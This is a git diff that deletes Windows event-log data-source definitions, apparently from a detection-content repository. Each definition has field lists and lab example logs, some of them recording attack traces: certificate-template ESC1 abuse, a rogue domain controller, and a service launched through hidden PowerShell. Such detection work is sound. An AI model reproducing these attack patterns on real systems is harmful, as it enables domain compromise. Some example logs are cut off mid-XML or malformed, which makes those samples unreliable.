-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4794</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-08-23T04:24:05.064689300Z'/><EventRecordID>821077</EventRecordID><Correlation ActivityID='{4EC0CCF2-B67B-0004-F8CC-C04E7BB6D801}'/><Execution ProcessID='612' ThreadID='4120'/><Channel>Security</Channel><Computer>win-dc-root-17044-552.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x959c5</Data><Data Name='Workstation'>[fe80::b907:7694:d740:91bb]</Data><Data Name='Status'>0x0</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
deleted file mode 100644
index 1728e6d603..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4798.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 4798
-fields:
-- _time
-- ActivityID
-- CallerProcessId
-- CallerProcessName
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- TargetDomainName
-- TargetSid
-- TargetUserName
-- Target_Domain
-- Target_User_Name
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- session_id
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4798</EventID><Version>0</Version><Level>0</Level><Task>13824</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-02-02T00:12:21.404799400Z'/><EventRecordID>386860</EventRecordID><Correlation ActivityID='{A0011278-554F-0000-8212-01A04F55DA01}'/><Execution ProcessID='584' ThreadID='5616'/><Channel>Security</Channel><Computer>ar-win-2.attackrange.local</Computer><Security/></System><EventData><Data Name='TargetUserName'>Guest</Data><Data Name='TargetDomainName'>AR-WIN-2</Data><Data Name='TargetSid'>AR-WIN-2\Guest</Data><Data Name='SubjectUserSid'>AR-WIN-2\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>AR-WIN-2</Data><Data Name='SubjectLogonId'>0x2f4df4</Data><Data Name='CallerProcessId'>0x1590</Data><Data Name='CallerProcessName'>C:\Windows\ImmersiveControlPanel\telegram\telegram.exe</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
deleted file mode 100644
index eb6b9192b9..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4876.yml
+++ /dev/null
@@ -1,72 +0,0 @@
-event_name: Windows Event Log Security 4876
-fields:
-- _time
-- ActivityID
-- BackupType
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4876</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-02-06T16:27:05.403719800Z'/><EventRecordID>15379961</EventRecordID><Correlation ActivityID='{E37FFFB9-381B-0002-BFFF-7FE31B38D901}'/><Execution ProcessID='652' ThreadID='692'/><Channel>Security</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security/></System><EventData><Data Name='BackupType'>1</Data><Data Name='SubjectUserSid'>S-1-5-21-2690122726-1172718210-436210976-500</Data><Data Name='SubjectUserName'>administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0xeb075</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
deleted file mode 100644
index 35713b9911..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4886.yml
+++ /dev/null
@@ -1,64 +0,0 @@
-event_name: Windows Event Log Security 4886
-fields:
-- _time
-- ActivityID
-- Attributes
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- RequestId
-- Requester
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4886</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-02-06T13:13:36.529622400Z'/><EventRecordID>15379925</EventRecordID><Correlation ActivityID='{E37FFFB9-381B-0002-BFFF-7FE31B38D901}'/><Execution ProcessID='652' ThreadID='368'/><Channel>Security</Channel><Computer>win-dc-mhaag-attack-range-84.attackrange.local</Computer><Security/></System><EventData><Data Name='RequestId'>7</Data><Data Name='Requester'>ATTACKRANGE\administrator</Data><Data Name='Attributes'>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
deleted file mode 100644
index 6d4345d3a2..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_4887.yml
+++ /dev/null
@@ -1,67 +0,0 @@
-event_name: Windows Event Log Security 4887
-fields:
-- _time
-- ActivityID
-- Attributes
-- Channel
-- Computer
-- Disposition
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- RecordNumber
-- RequestId
-- Requester
-- Subject
-- SubjectKeyIdentifier
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>4887</EventID><Version>0</Version><Level>0</Level><Task>12805</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-06-09T14:54:02.171703300Z'/><EventRecordID>1830974609</EventRecordID><Correlation ActivityID='{28AAD79F-81AB-0001-BED7-AA28AB81D901}'/><Execution ProcessID='668' ThreadID='3160'/><Channel>Security</Channel><Computer>cert_authority.attack_range.local</Computer><Security/></System><EventData><Data Name='RequestId'>7</Data><Data Name='Requester'>attack_range\attack_user</Data><Data Name='Attributes'>CertificateTemplate:VulnerableTemplate_ESC1
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
deleted file mode 100644
index c2708b5e4d..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5136.yml
+++ /dev/null
@@ -1,82 +0,0 @@
-event_name: Windows Event Log Security 5136
-fields:
-- _time
-- ActivityID
-- AppCorrelationID
-- AttributeLDAPDisplayName
-- AttributeSyntaxOID
-- AttributeValue
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- OperationType
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5136</EventID><Version>0</Version><Level>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-11-17T20:51:01.321860300Z'/><EventRecordID>1997365</EventRecordID><Correlation ActivityID='{F8EE8E31-F924-0000-3E8E-EEF824F9D801}'/><Execution ProcessID='652' ThreadID='5112'/><Channel>Security</Channel><Computer>win-dc-mvelazco-02713-392.attackrange.local</Computer><Security/></System><EventData><Data Name='OpCorrelationID'>{73C96723-504B-4F15-830A-F4DDB1C48F2E}</Data><Data Name='AppCorrelationID'>-</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x95675</Data><Data Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN=DANNIE_CERVANTES,OU=ServiceAccounts,OU=OGC,OU=Stage,DC=attackrange,DC=local</Data><Data Name='ObjectGUID'>{15AFB68A-679C-4F5B-AC18-4D988B3B3E44}</Data><Data Name='ObjectClass'>user</Data><Data Name='AttributeLDAPDisplayName'>servicePrincipalName</Data><Data Name='AttributeSyntaxOID'>2.5.5.12</Data><Data Name='AttributeValue'>adm/srv1.attackrange.local</Data><Data Name='OperationType'>%%14674</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
deleted file mode 100644
index a85ca6abfa..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5137.yml
+++ /dev/null
@@ -1,77 +0,0 @@
-event_name: Windows Event Log Security 5137
-fields:
-- _time
-- AppCorrelationID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Level
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/><EventID>5137</EventID><Version>0</Version><Level>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2023-03-27T20:59:21.097880600Z'/><EventRecordID>170140</EventRecordID><Correlation/><Execution ProcessID='612' ThreadID='736'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='OpCorrelationID'>{681cac8c-b5a4-48fd-be93-4339996bd94d}</Data><Data Name='AppCorrelationID'>-</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x8561a</Data><Data Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN={2C4C7CD3-7AA5-4E84-89B5-CE9FC75611D4},CN=Policies,CN=System,DC=attackrange,DC=local</Data><Data Name='ObjectGUID'>{3e7ae4de-29a6-41c1-b27c-bf9548b0444c}</Data><Data Name='ObjectClass'>groupPolicyContainer</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
deleted file mode 100644
index 1d0338a8f2..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5141.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: Windows Event Log Security 5141
-fields:
-- _time
-- ActivityID
-- AppCorrelationID
-- Caller_Domain
-- Caller_User_Name
-- Channel
-- Computer
-- DSName
-- DSType
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventID
-- EventRecordID
-- Guid
-- Keywords
-- Logon_ID
-- Name
-- ObjectClass
-- ObjectDN
-- ObjectGUID
-- OpCorrelationID
-- Opcode
-- ProcessID
-- RecordNumber
-- SubjectDomainName
-- SubjectLogonId
-- SubjectUserName
-- SubjectUserSid
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- TreeDelete
-- Version
-- action
-- app
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- name
-- product
-- punct
-- session_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- status
-- subject
-- ta_windows_action
-- tag
-- tag::action
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5141</EventID><Version>0</Version><Le>0</Level><Task>14081</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2022-10-17T21:08:49.470503100Z'/><EventRecordID>670908</EventRecordID><Correlation ActivityID='{5FD5D64A-DD82-0004-52D6-D55F82DDD801}'/><Execution ProcessID='648' ThreadID='3328'/><Channel>Security</Channel><Computer>win-dc-range-02713-392.attackrange.local</Computer><Security/></System><EventData><Data Name='OpCorrelationID'>{A3058236-A662-445E-9BEB-DE9210B143AB}</Data><Data Name='AppCorrelationID'>-</Data><Data Name='SubjectUserSid'>ATTACKRANGE\Administrator</Data><Data Name='SubjectUserName'>Administrator</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x978ac22</Data><Data Name='DSName'>attackrange.local</Data><Data Name='DSType'>%%14676</Data><Data Name='ObjectDN'>CN=NTDS Settings,CN=WIN-HOST-ROGUE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=attackrange,DC=local</Data><Data Name='ObjectGUID'>{48387E55-8777-403F-BC63-2A38289A6BBF}</Data><Data Name='ObjectClass'>nTDSDSA</Data><Data Name='TreeDelete'>%%14679</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
deleted file mode 100644
index 56e69ac05f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_Security_5145.yml
+++ /dev/null
@@ -1,117 +0,0 @@
-event_name: Windows Event Log Security 5145
-fields:
-  - _time
-  - AccessList
-  - AccessMask
-  - AccessReason
-  - Caller_Domain
-  - Caller_User_Name
-  - Channel
-  - Computer
-  - Error_Code
-  - EventCode
-  - EventData_Xml
-  - EventID
-  - EventRecordID
-  - Guid
-  - IpAddress
-  - IpPort
-  - Keywords
-  - Level
-  - Logon_ID
-  - Name
-  - ObjectType
-  - Opcode
-  - ProcessID
-  - RecordNumber
-  - RelativeTargetName
-  - ShareLocalPath
-  - ShareName
-  - Source_Port
-  - Source_Workstation
-  - SubjectDomainName
-  - SubjectLogonId
-  - SubjectUserName
-  - SubjectUserSid
-  - SystemTime
-  - System_Props_Xml
-  - Task
-  - ThreadID
-  - Version
-  - action
-  - app
-  - date_hour
-  - date_mday
-  - date_minute
-  - date_month
-  - date_second
-  - date_wday
-  - date_year
-  - date_zone
-  - dest
-  - dvc
-  - dvc_nt_host
-  - event_id
-  - eventtype
-  - file_name
-  - file_path
-  - host
-  - id
-  - index
-  - linecount
-  - name
-  - product
-  - punct
-  - session_id
-  - signature
-  - signature_id
-  - source
-  - sourcetype
-  - splunk_server
-  - src
-  - src_ip
-  - src_nt_domain
-  - src_nt_host
-  - src_port
-  - src_user
-  - status
-  - subject
-  - ta_windows_action
-  - tag
-  - tag::action
-  - tag::eventtype
-  - timeendpos
-  - timestartpos
-  - vendor
-  - vendor_product
-field_mappings:
-  - data_model: custom_cim
-    data_set: Endpoint.Processes
-    mapping:
-      AccessList: access_list
-      AccessMask: access_mask
-      AccessReason: access_result
-      RelativeTargetName: relative_target_name
-      ObjectType: object_type
-      IpAddress: src_ip
-      IpPort: src_port
-      SubjectDomainName: user_domain
-      SubjectUserName: user
-      SubjectLogonId: user_logon_id
-      SubjectUserSid: user_sid
-      ShareName: share
-  - data_model: ocsf
-    mapping:
-      AccessList: access_list
-      AccessMask: access_mask
-      AccessReason: access_result
-      RelativeTargetName: file.path
-      ObjectType: file.type
-      IpAddress: src_endpoint.ip
-      IpPort: src_endpoint.port
-      SubjectDomainName: actor.user.domain
-      SubjectUserName: actor.user.name
-      SubjectLogonId: actor.session.uid
-      SubjectUserSid: actor.user.uid
-      ShareName: share
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-A5BA-3E3B0328C30D}'/><EventID>5145</EventID><Version>0</Version><Level>0</Level><Task>12811</Task><Opcode>0</Opcode><Keywords>0x8020000000000000</Keywords><TimeCreated SystemTime='2024-03-11T03:06:39.742608600Z'/><EventRecordID>2018939</EventRecordID><Correlation/><Execution ProcessID='4' ThreadID='304'/><Channel>Security</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='SubjectUserSid'>ANONYMOUS LOGON</Data><Data Name='SubjectUserName'>ANONYMOUS LOGON</Data><Data Name='SubjectDomainName'>ATTACKRANGE</Data><Data Name='SubjectLogonId'>0x13ef1b</Data><Data Name='ObjectType'>File</Data><Data Name='IpAddress'>10.0.1.15</Data><Data Name='IpPort'>50160</Data><Data Name='ShareName'>\\*\SYSVOL</Data><Data Name='ShareLocalPath'>\??\C:\Windows\SYSVOL\sysvol</Data><Data Name='RelativeTargetName'>lsarpc</Data><Data Name='AccessMask'>0x120089</Data><Data Name='AccessList'>%%1538
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml
deleted file mode 100644
index 6374e6f659..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_4728.yml
+++ /dev/null
@@ -1,88 +0,0 @@
-event_name: Windows Event Log System 4728
-fields:
-- _time
-- Account_Domain
-- Account_Name
-- CategoryString
-- ComputerName
-- Error_Code
-- EventCode
-- EventType
-- Keywords
-- LogName
-- Logon_ID
-- Message
-- OpCode
-- RecordNumber
-- Security_ID
-- SourceName
-- Subject_Account_Domain
-- Subject_Account_Name
-- Subject_Logon_ID
-- Subject_Security_ID
-- Target_Account_Domain
-- Target_Account_Name
-- Target_Security_ID
-- TaskCategory
-- Type
-- action
-- app
-- body
-- category
-- change_type
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dest_nt_domain
-- dest_nt_host
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- member_dn
-- member_id
-- member_nt_domain
-- msad_action
-- name
-- object
-- object_attrs
-- object_category
-- object_id
-- product
-- punct
-- result
-- session_id
-- severity
-- severity_id
-- signature
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- src_nt_domain
-- src_user
-- src_user_name
-- status
-- subject
-- ta_windows_action
-- ta_windows_security_CategoryString
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- user_group
-- user_name
-- vendor
-- vendor_product
-example_log: 10/09/2020 10:41:29 AM
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
deleted file mode 100644
index c489248e4f..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7036.yml
+++ /dev/null
@@ -1,59 +0,0 @@
-event_name: Windows Event Log System 7036
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- status
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service Control Manager'/><EventID Qualifiers='16384'>7036</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated SystemTime='2024-03-11T01:38:35.892897800Z'/><EventRecordID>168530</EventRecordID><Correlation/><Execution ProcessID='588' ThreadID='2272'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security/></System><EventData><Data Name='param1'>sppsvc</Data><Data Name='param2'>stopped</Data><Binary>7300700070007300760063002F0031000000</Binary></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
deleted file mode 100644
index 55fc9c8100..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7040.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: Windows Event Log System 7040
-fields:
-- _time
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- param1
-- param2
-- param3
-- param4
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- start_mode
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service Control Manager'/><EventID Qualifiers='16384'>7040</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated SystemTime='2024-03-05T08:53:41.173068700Z'/><EventRecordID>168231</EventRecordID><Correlation/><Execution ProcessID='592' ThreadID='3404'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security UserID='S-1-5-21-3344543075-1022232225-2459664213-500'/></System><EventData><Data Name='param1'>Print Spooler</Data><Data Name='param2'>demand start</Data><Data Name='param3'>disabled</Data><Data Name='param4'>Spooler</Data></EventData></Event>
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
deleted file mode 100644
index aaad72e7bc..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_System_7045.yml
+++ /dev/null
@@ -1,63 +0,0 @@
-event_name: Windows Event Log System 7045
-fields:
-- _time
-- AccountName
-- Channel
-- Computer
-- Error_Code
-- EventCode
-- EventData_Xml
-- EventRecordID
-- EventSourceName
-- Guid
-- ImagePath
-- Keywords
-- Level
-- Name
-- Opcode
-- ProcessID
-- Qualifiers
-- RecordNumber
-- ServiceName
-- ServiceType
-- StartType
-- SystemTime
-- System_Props_Xml
-- Task
-- ThreadID
-- UserID
-- Version
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- dvc_nt_host
-- event_id
-- eventtype
-- host
-- id
-- index
-- linecount
-- product
-- punct
-- service
-- service_name
-- signature_id
-- source
-- sourcetype
-- splunk_server
-- start_mode
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user_id
-- vendor
-- vendor_product
-example_log: <Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'><System><Provider Name='Service Control Manager' Guid='{555908d1-a6d7-4695-8e1e-26931d2012f4}' EventSourceName='Service Control Manager'/><EventID Qualifiers='16384'>7045</EventID><Version>0</Version><Level>4</Level><Task>0</Task><Opcode>0</Opcode><Keywords>0x8080000000000000</Keywords><TimeCreated SystemTime='2024-03-04T10:11:25.483986000Z'/><EventRecordID>168145</EventRecordID><Correlation/><Execution ProcessID='592' ThreadID='1712'/><Channel>System</Channel><Computer>ar-win-dc.attackrange.local</Computer><Security UserID='S-1-5-21-3344543075-1022232225-2459664213-500'/></System><EventData><Data Name='ServiceName'>KrbSCM</Data><Data Name='ImagePath'>powershell.exe -WindowStyle Hiddenestno'
diff --git a/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml b/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
deleted file mode 100644
index 7136aa2a74..0000000000
--- a/data_sources/endpoint/event_sources/Windows_Event_Log_TaskScheduler_200.yml
+++ /dev/null
